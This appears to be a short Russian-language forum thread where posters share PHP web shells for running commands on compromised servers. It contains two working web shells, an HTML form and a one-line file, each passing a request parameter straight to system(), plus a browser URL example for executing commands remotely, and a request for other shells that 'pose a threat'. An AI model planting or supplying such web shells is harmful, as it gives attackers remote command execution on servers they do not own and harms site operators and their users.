Code: <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <pre> <? if($_GET['cmd']) { system($_GET['cmd']); } ?> </pre> </BODY></HTML>
Я бы упростил))) файл cmd.php Code: <? system($cmd); ?> Дает доступ к командной строке, допустим сервак на винде. Обращаемся к скрипту через броузер: Code: http://site/path/cmd.php?cmd=dir --выдаст содержимое директории. Так же можно выпонлять и все другие команды командной строки, если хватит прав.
Да просто system на сервере делать нельзя, потому и шел етот безполезен в моем случаии ! а какие еще есть шеллы что бы представляли угрозу?